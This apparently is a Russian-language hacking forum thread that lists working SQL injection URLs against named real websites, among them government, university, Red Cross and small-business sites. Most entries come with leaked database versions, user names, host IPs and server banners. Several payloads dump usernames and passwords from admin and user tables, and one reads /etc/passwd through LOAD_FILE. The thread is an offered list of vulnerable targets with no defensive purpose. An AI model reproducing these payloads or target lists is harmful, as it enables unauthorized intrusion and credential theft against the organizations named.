SQL Инъекции

www.zhambyl.kz - Официальный сайт Акимата Жамбылской области

Code:

http://customers.zhambyl.kz/user_info.php?user_id=-45+union+all+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

Code:

5.0.51a-24+lenny2:wwwrun@localhost:contents

 

http://www.ac.edu/sports/new_showsport.php?sport_id=-10+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),6,7,8--

PR-5

 

Code:

http://my-symbian.com/s60/software/category.php?fldAuto=30 UNION ALL SELECT 1,%String_Col%,3--

Host IP: 62.129.249.144
Web Server: IdeaWebServer/v0.70
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: my_symbian

Code:

http://jansdotter.com/shop/categ.php?category=17 and(select 1 from(select count(*),concat((select (select %String_Col%) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Host IP: 173.45.243.31
Web Server: Apache
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: jansdotter

шоп

Code:

http://www.yaguza.com/category/category.php?categoryID=58 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10--

Host IP: 69.93.124.182
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: yaguza_test

Code:

http://www.inventiondb.com/view.php?id=546 UNION ALL SELECT 1,2,3,4,5,%String_Col%,7,8,9,10--

Host IP: 64.79.143.102
Web Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8k DAV/2 PHP/5.3.0
Powered-by: PHP/5.3.0
DB Server: MySQL unknown ver
Current DB: irdb

Code:

http://www.woodworkersworkshop.com/resources/index.php?cat=9  UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12 and 'x'='x

Host IP: 72.167.35.10
Web Server: Apache/2.2.8 (Fedora)
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: probe

Code:

http://www.templateshunt.com/templatehunt.php?category=56  AND %True_Expression%

Host IP: 65.98.16.26
Web Server: Apache/1.3.36 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.27 OpenSSL/0.9.7a
Powered-by: PHP/4.4.4
DB Server: MySQL >=5
Current DB: temphunt_template

Code:

http://www.penfieldbooks.com/category.php?category=4 AND %True_Expression% AND 'x'='x

Host IP: 67.18.15.15
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: penfield4lkjslkf

хакИр

 

http://biochem.uthscsa.edu/news_article.php?newsID=-23+union+select+1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os)


PR-8

тИЦ-300

Страниц в Яндекс - 3878

 

edu​

Code:

http://www.tolani.edu/tmi/index.php?id=107 UNION ALL SELECT %String_Col%,2,3--

Host IP: 208.115.32.44
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25 PHP/5.2.11
Powered-by: PHP/5.2.11
DB Server: MySQL >=5
Current DB: tolanie_tmiphp

Code:

http://wsm.wsu.edu/s/index.php?id=744 UNION ALL SELECT %String_Col%,2--

Host IP: 134.121.140.52
Web Server: Microsoft-IIS/7.5
Powered-by: PHP/5.2.13
Powered-by: ASP.NET
DB Server: MySQL unknown ver
Current DB: wsm_articles

Code:

http://www.brockport.edu/athletics/football/index.php?id=67 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 and 'x'='x

Host IP: 137.21.162.30
Web Server: Apache
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: athletics

Code:

http://www.research.chop.edu/research/profiles/index.php?ID=927377 and 1=convert(int,%String_Col%) and '1'='1

Host IP: 159.14.240.240
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MSSQL 2000 with error
Current DB: StokesIntranetWeb

Code:

http://envs.uoregon.edu/alumni/index.php?id=92 and(select 1 from(select count(*),concat((select (select %String_Col%) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Host IP: 128.223.21.97
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7l PHP/5.3.0
Powered-by: PHP/5.3.0
DB Server: MySQL >=5
Current DB: alumni

Code:

http://vesta.cumc.columbia.edu/dermatology/index.php?id=%27jt165 AND %True_Expression%

Host IP: 156.111.235.215
Web Server: Apache
Powered-by: PHP/5.1.4
DB Server: MySQL
Current DB:

 

Code:

http://www.mauifin.com/fin_info.php?id=-12+union+select+1,concat_ws(0x3a%20,user(),database(),version()),3,4,5,6,7--

User: irie_admin@localhost
Version: 5.0.90-community
Database: irie_info

Google PR: 4

 

PR - 4

Code:

http://www.iksbv.nl/english/news.php?ID=-7+union+select+1,2,3,4,concat_ ws(0x3a,version(),datab ase(),user()),6--

Version:4.1.25
User:iksbv
Database:iksbv@localhost

----------------------------------

Pr - 2

Code:

http://www.btt-rotterdam.nl/english/news.php?id=-51+union+select+1,2,3,concat_w s(0x3a,version(),data base(),user()),5--

Version:5.0.27-log
User:btt
Database:btt@localhost
os:redhat-linux-gnu



зверяка:

Code:

http://www.btt-rotterdam.nl/english/news.php?id=-51+union+select+1,2,3,concat_ws(0x3a,loginname,pass word,privs),5+from+yann sms_members--

----------------------------------

Pr - 4

Code:

http://www.ommenleeft.nl/news.php?id=-912+union+select+1,2,concat_ws(0x3a,vers ion(),database(),user() ),4,5,6, 7,8--

Version:5.0.84-0.dotdeb.0-log
Usernamemmenlee
Databasemmenlee@localhost
OS:debian-linux-gnu

Code:

http://www.ommenleeft.nl/news.php?id=-912+union+select+1,2,concat_ws(0x3a,username,password),4,5,6 ,7,8+from+grafic oncept_users+limit+0,1--

 

Российский Красный Крест

Code:

http://www.rokk.ru/index.php?cat=50&item=-21+and+1=2+union+select+1,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13+--

version : 5.1.30
user : rokk@localhost
database : rokk
os : portbld-freebsd6.0

 

Code:

http://wildpartygames.com/product.php?product_id=999999'+union+select+1,2,concat_ws(0x3a%20,user(),database(),version()),4,5,6,7,8,9/*

User: wpg@localhost
Version: 4.1.22
Database: wpg

 

Memorial Web Site Script

 

www.dashboardwidgets.com/showcase/showcat.php?cid=-43 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15--

 

http://edu-chem.co.uk/product.php?product_id=-29+union+select+1,2,3,concat_ws(user(),version(),database(),@@version_compile_os),5,6,7,8,9,10,11,12

 

PR - 6

Code:

http://www.karamuzejs.lv/index.php?id=-2+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),data base(),user()),0x71),0x71),4,5--

Version : 4.1.11-standard
Database : karamuzejs_gov_lv_-_karamuzejs
User : muzejnieks@localhost
OS : pc-linux-gnu

+--------------------------------------------+

PR - 5

Code:

http://www.tmf.rtu.lv/index.php?id=-6+union+select+1,2,3,4,concat_ws(0x3a,version(),datab ase(),user())%20,6,7,8,9--

Version : 5.0.27
Database : lv-tmf
User : root@localhost
OS : redhat-linux-gnu

/etc/passwd

Code:

http://www.tmf.rtu.lv/index.php?id=-6+union+select+1,2,3,4,LOAD_ FILE(0x2f6574632f706173737764),6,7,8,9--

 

мой первый пост на ачате :-D

http://www.upennrrtc.org/project/products/view.php?id=-23+union+select+1,2,group_concat(user_username,0x3a,user_password,0x0b),4,5,6+from+user/*


http://www.euroizol.com.ua/products/view.php?id=-10+union+select+1,2,3,4,5,6,7,group_concat(us_login,0x3a,us_pass,0x0b),9,10,11,12,13,14,15,16,17+from+ei_users

 

Code:

http://www.promethean-editions.com/php/NewsDetail.php?ID=-142+union+select+1,2,3,4,version(),6,7,8,9,0,11,12,13,14/*

Database Version: 4.0.27-standard-log
Database name: pelprod
User name: [email protected]

-----------------------------------------------------------------------------------------------------

Code:

http://www.fundacionapoye.org/php/ampliar_general_indice.php?id=6&clave=-2+union+select+1,version(),3,4,5--

Database Version: 5.0.87-a2hosting-percona
Database name: apoye_fapoye
User name: apoye_edison@localhost

-----------------------------------------------------------------------------------------------------

http://ffg.jeudego.org/php/affichePersonne.php?id=7921'

Database Version: 5.0.51a-24+lenny3
Database name: ffg
User name: lecteur@localhost

 

PR - 5

Code:

http://www.detki.lv/baika.php?id=-126+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(0x3a,ve rsion(),database(),user()),0x71),0x71)--

Version : 4.1.15-Debian_1ubuntu5-log
Database : c_detki
User : [email protected]

+---------------------------------------------+

PR - 5

Version : 5.1.25-rc-standard
Database : lob_lv
User : [email protected]
OS : pc-solaris2.10

Code:

http://www.lob.lv/lv/aktualitates.php?id=-325+union+select+concat_ws(0x3a,username,user_password,user_ level),2+from+ph pbb_users+limit+1,1--

эта самая тупая скуля, там море таблиц, и все на латвийском каждая таблица это translate в итоге добрался до phpbb и забил

 

Code:

http://www.rusbiotech.ru/novice/show.php?id=-440+union+select+1,2,version(),4,5,6,7,8,9,10--

 

.IR​

Code:

http://www.teo.ir/gorooha/4/index.php?id=1 and(select 1 from(select count(*),concat((select (select %String_Col%) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Host IP: 91.98.99.162
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: io

Code:

http://www.womennews.ir/index.php?id=40 AND %True_Expression%

Host IP: 207.210.118.213
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: ,

Иран....... чот нигде не встречал скули , решил найти и запостить

 

Code:

http://www.concellotui.org/php/noticias.php?id=688+union+select+1,2,3,4,version(),6,7,8,9/*

Database Version: 4.1.22
Database name: qai608
User name: [email protected]

-----------------------------------------------------------------------------------------------------------------

Code:

http://www.christianword.org/php/default.php?page_id=view_testimony&id=-499+union+select+1,version(),3,4,5--

Database Version: 5.0.90-community
Database name: mobil0_cwm
User name: mobil0_server1@localhost

----------------------------------------------------------------------------------------------------------------------------

Code:

http://www.kummarashalivahana.org/php/greatprofiles_details.php?id=-51+union+select+1,version(),3,4,5,6,7,8--

5.0.67.d7-ourdelta-log

----------------------------------------------------------------------------------------------------------------------------

Code:

http://www.wolfdog.org/php/modules.php?op=modload&name=WolfdogShows&newlang=eng&file=successes&id=-8372+union+select+version(),2--

Database Version: 5.0.87-b20-log
Database name: wolfdog_dbase
User name: [email protected]

-----------------------------------------------------------------------------------------------------------------------------

Code:

http://www.timothysmithnetwork.org/courseDetails.php?id=-1652+union+select+1,2,3,4,5,version(),7,8,9,0,11,12,13,14,15,16,17,18--

Database Version: 5.0.67-log
Database name: timothy_smith_network
User name: [email protected]

 

http://www.promd.us/news.php?cat=-2+/*!union*/+select+1,CONCAT(userId,0x7c,fName,0x7c,lName,0x7c,0x7c,userName,0x7c,password,0x7c,email),3,4+from+ promd_admin_users+LIMIT+0,1--&id=7